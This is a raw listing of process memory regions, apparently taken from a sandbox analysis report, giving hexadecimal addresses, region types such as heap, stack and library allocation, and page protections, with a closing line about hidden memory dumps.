7FFD9B990000
trusted library allocation
page read and write
13C0000
heap
page read and write
7FFD9B900000
trusted library allocation
page read and write
1D277CA5000
heap
page read and write
7FFD9B6B0000
trusted library allocation
page read and write
7FFD9B600000
trusted library allocation
page execute and read and write
1E6F6F6C000
heap
page read and write
7FFD9B59C000
trusted library allocation
page execute and read and write
2093B09B000
heap
page read and write
177D8CB5000
heap
page read and write
7FFD9B660000
trusted library allocation
page execute and read and write
1559E39B000
heap
page read and write
7FFD9B830000
trusted library allocation
page read and write
1E6F4CD0000
heap
page read and write
1628D03B000
trusted library allocation
page read and write
1160000
heap
page read and write
7FFD9B7C0000
trusted library allocation
page read and write
7FFD9B702000
trusted library allocation
page read and write
1D277CD7000
heap
page read and write
24FFAD00000
heap
page read and write
E8BC23F000
stack
page read and write
4061000
trusted library allocation
page read and write
1D279ACA000
heap
page read and write
1340000
heap
page read and write
7FFD9B523000
trusted library allocation
page execute and read and write
20920FD0000
heap
page read and write
1D9870A1000
trusted library allocation
page read and write
3081000
trusted library allocation
page read and write
2B69A4E1000
trusted library allocation
page read and write
20ECE816000
trusted library allocation
page read and write
8A252B9000
stack
page read and write
24FE4353000
trusted library allocation
page read and write
1D3332A7000
trusted library allocation
page read and write
2B69A340000
heap
page read and write
8A24FFE000
stack
page read and write
17098DD4000
heap
page read and write
1DE3B318000
heap
page read and write
1DE3DAA8000
trusted library allocation
page read and write
7FFD9B890000
trusted library allocation
page read and write
14AB000
heap
page read and write
25F80394000
trusted library allocation
page read and write
1628D6D0000
trusted library allocation
page read and write
7FFD9B543000
trusted library allocation
page execute and read and write
177D7220000
heap
page read and write
2B69B45A000
trusted library allocation
page read and write
E8BD20C000
stack
page read and write
15585FE4000
trusted library allocation
page read and write
1280000
heap
page read and write
2B6B28F2000
heap
page read and write
177DA511000
trusted library allocation
page read and write
20ECDAF0000
heap
page read and write
7FFD9B5D0000
trusted library allocation
page execute and read and write
54EE000
stack
page read and write
15585FB1000
trusted library allocation
page read and write
7FFD9B740000
trusted library allocation
page read and write
7FFD9B850000
trusted library allocation
page read and write
AFFEAFE000
stack
page read and write
24FE2510000
heap
page execute and read and write
209210C3000
heap
page read and write
1D279B35000
heap
page read and write
7FFD9B720000
trusted library allocation
page execute and read and write
24FF25A2000
trusted library allocation
page read and write
20ECE30A000
trusted library allocation
page read and write
1D985577000
heap
page read and write
1D34AD5E000
heap
page read and write
5B9E000
stack
page read and write
1397000
trusted library allocation
page execute and read and write
13BE000
stack
page read and write
24FE0A8D000
heap
page read and write
7FFD9B7D0000
trusted library allocation
page read and write
7FFD9B7D0000
trusted library allocation
page read and write
7FFD9B930000
trusted library allocation
page read and write
182A8D80000
heap
page read and write
1DE3D78C000
trusted library allocation
page read and write
244E13E0000
heap
page read and write
7FFD9B704000
trusted library allocation
page read and write
1D33327D000
trusted library allocation
page read and write
3F11000
trusted library allocation
page read and write
565F000
stack
page read and write
1D277CD7000
heap
page read and write
1D277C90000
heap
page read and write
1D98745A000
trusted library allocation
page read and write
1D279AF1000
heap
page read and write
182A90D4000
heap
page read and write
1D985440000
heap
page read and write
25F80109000
trusted library allocation
page read and write
2B6988BE000
heap
page read and write
2B6B2BB3000
heap
page read and write
1709A810000
heap
page read and write
2B6AA511000
trusted library allocation
page read and write
8A253BE000
stack
page read and write
63D503E000
stack
page read and write
1D34AEC0000
heap
page read and write
1D332DF1000
trusted library allocation
page read and write
1D3331FF000
trusted library allocation
page read and write
182A8E44000
heap
page read and write
1A0724E000
stack
page read and write
1E6F4F2B000
heap
page read and write
7FFD9B770000
trusted library allocation
page read and write
170244E1000
heap
page read and write
24FFAD8E000
heap
page read and write
1DE3B364000
heap
page read and write
7FFD9B6F0000
trusted library allocation
page execute and read and write
177D8B30000
trusted library allocation
page read and write
2B6B2AC0000
heap
page read and write
182A8DC0000
heap
page read and write
1D985420000
heap
page read and write
7FFD9B880000
trusted library allocation
page read and write
15C86430000
heap
page read and write
1709A8A0000
trusted library allocation
page read and write
8A250FE000
stack
page read and write
1D330BD0000
heap
page read and write
220D11DE000
heap
page read and write
155860B1000
trusted library allocation
page read and write
15583F90000
heap
page read and write
11A0000
trusted library allocation
page read and write
E8BC63B000
stack
page read and write
7FFD9B810000
trusted library allocation
page read and write
CCF1B7D000
stack
page read and write
20921109000
heap
page read and write
1340000
heap
page read and write
14EB000
trusted library allocation
page execute and read and write
24FE0A50000
heap
page read and write
2B6B2832000
heap
page read and write
24FFADB7000
heap
page read and write
7FFD9B7C0000
trusted library allocation
page read and write
1D333242000
trusted library allocation
page read and write
1628CC70000
heap
page readonly
63D4C7F000
stack
page read and write
2093B099000
heap
page read and write
15584040000
heap
page read and write
1D277ED5000
heap
page read and write
220D1370000
trusted library allocation
page read and write
7FFD9B6E2000
trusted library allocation
page read and write
24FFAE37000
heap
page read and write
7FFD9B750000
trusted library allocation
page read and write
7FFD9B869000
trusted library allocation
page read and write
13FE000
stack
page read and write
177DA574000
trusted library allocation
page read and write
20ECC016000
heap
page read and write
1D3331E5000
trusted library allocation
page read and write
155864C6000
trusted library allocation
page read and write
1100000
heap
page read and write
7FFD9B899000
trusted library allocation
page read and write
3F41000
trusted library allocation
page read and write
13C5000
heap
page read and write
13CB000
heap
page read and write
24FE24D0000
trusted library allocation
page read and write
7FFD9B543000
trusted library allocation
page execute and read and write
1709AF27000
trusted library allocation
page read and write
1D342D61000
trusted library allocation
page read and write
1D98552B000
heap
page read and write
7FFD9B7E0000
trusted library allocation
page read and write
2F51000
trusted library allocation
page read and write
2B69B462000
trusted library allocation
page read and write
1DE3D2F1000
trusted library allocation
page read and write
1DE3B3A9000
heap
page read and write
7FFD9B8AC000
trusted library allocation
page read and write
177D7030000
heap
page read and write
CCFA2FE000
stack
page read and write
475137C000
stack
page read and write
15C86250000
heap
page read and write
1D279AF1000
heap
page read and write
7FFD9B53D000
trusted library allocation
page execute and read and write
7FFD9B714000
trusted library allocation
page read and write
7FFD9B7E0000
trusted library allocation
page read and write
5BFE000
stack
page read and write
1184000
trusted library allocation
page read and write
24FFAACE000
heap
page read and write
177D8BE0000
heap
page read and write
20EE6220000
heap
page execute and read and write
2BA67E000
stack
page read and write
7FFD9B720000
trusted library allocation
page read and write
7FFD9B753000
trusted library allocation
page read and write
1DE3D269000
trusted library allocation
page read and write
7FFD9B820000
trusted library allocation
page read and write
1D330B10000
heap
page read and write
1A0687B000
stack
page read and write
24FFAAB0000
heap
page read and write
209231BE000
trusted library allocation
page read and write
1D277C52000
heap
page read and write
7FFD9B8B0000
trusted library allocation
page read and write
1DE3B3E2000
heap
page read and write
7FFD9B760000
trusted library allocation
page read and write
7FFD9B7F0000
trusted library allocation
page read and write
E8BC3B8000
stack
page read and write
1559E380000
heap
page execute and read and write
7FFD9B730000
trusted library allocation
page read and write
7FFD9B780000
trusted library allocation
page read and write
1D277CD3000
heap
page read and write
2BA5FC000
stack
page read and write
2E7CE3B000
stack
page read and write
1DE3D25E000
trusted library allocation
page read and write
7FFD9B720000
trusted library allocation
page read and write
12CA000
trusted library allocation
page execute and read and write
20ECC035000
heap
page read and write
7DF48B2C0000
trusted library allocation
page execute and read and write
8A25178000
stack
page read and write
7DF48B2E0000
trusted library allocation
page execute and read and write
7FFD9B870000
trusted library allocation
page read and write
24FE312D000
trusted library allocation
page read and write
12A4000
trusted library allocation
page read and write
1559E1E0000
heap
page read and write
1D9870FF000
trusted library allocation
page read and write
244E13C0000
heap
page read and write
2E9F000
stack
page read and write
516ADFD000
stack
page read and write
20ECC078000
heap
page read and write
17098E10000
heap
page read and write
20932D11000
trusted library allocation
page read and write
7FFD9B770000
trusted library allocation
page read and write
25F80154000
trusted library allocation
page read and write
15586849000
trusted library allocation
page read and write
1A072CD000
stack
page read and write
7FFD9B95D000
trusted library allocation
page read and write
2BA87B000
stack
page read and write
17098E38000
heap
page read and write
15595FB0000
trusted library allocation
page read and write
177D8B32000
trusted library allocation
page read and write
516AFFD000
stack
page read and write
91464FD000
stack
page read and write
220E3327000
trusted library allocation
page read and write
1628D52D000
trusted library allocation
page read and write
1D277C9D000
heap
page read and write
1628D4D7000
trusted library allocation
page read and write
17099194000
heap
page read and write
AFFE57E000
stack
page read and write
1D330EC0000
heap
page read and write
7FFD9B860000
trusted library allocation
page read and write
8A2553E000
stack
page read and write
24FE0A30000
heap
page read and write
15584195000
heap
page read and write
1628CE04000
heap
page read and write
1D332DF4000
trusted library allocation
page read and write
1D33323A000
trusted library allocation
page read and write
220D4AEC000
trusted library allocation
page read and write
5D4C5BE000
stack
page read and write
1D987591000
trusted library allocation
page read and write
7FFD9B550000
trusted library allocation
page read and write
56D0000
trusted library allocation
page read and write
EBB000
stack
page read and write
1D98552F000
heap
page read and write
1628B220000
heap
page read and write
1D986EA4000
heap
page read and write
7FFD9B5D0000
trusted library allocation
page read and write
20922D04000
heap
page read and write
24FE29FE000
trusted library allocation
page read and write
1628B33E000
heap
page read and write
1709AF37000
trusted library allocation
page read and write
7FFD9B700000
trusted library allocation
page execute and read and write
15585DE0000
trusted library allocation
page read and write
8C88D8F000
stack
page read and write
177D91C6000
trusted library allocation
page read and write
7FFD9B6D2000
trusted library allocation
page read and write
1D330C7F000
heap
page read and write
1D277C21000
heap
page read and write
12F0000
trusted library allocation
page read and write
1DE4D296000
trusted library allocation
page read and write
1D33322A000
trusted library allocation
page read and write
24FFAAF6000
heap
page read and write
7FFD9B7F0000
trusted library allocation
page read and write
1A6A90E1000
heap
page read and write
24FFAB14000
heap
page read and write
1D330C95000
heap
page read and write
7FFD9B7B0000
trusted library allocation
page read and write
1D279AF1000
heap
page read and write
7FFD9B820000
trusted library allocation
page read and write
20922E16000
trusted library allocation
page read and write
7FFD9B760000
trusted library allocation
page read and write
1370000
heap
page read and write
2F50000
heap
page execute and read and write
1E6F4F8B000
heap
page read and write
1D34AD5A000
heap
page read and write
24FF2828000
trusted library allocation
page read and write
24FE386C000
trusted library allocation
page read and write
CCF20FB000
stack
page read and write
182A9070000
trusted library allocation
page read and write
1D279C4A000
heap
page read and write
There are 1971 hidden memdumps, click here to show them.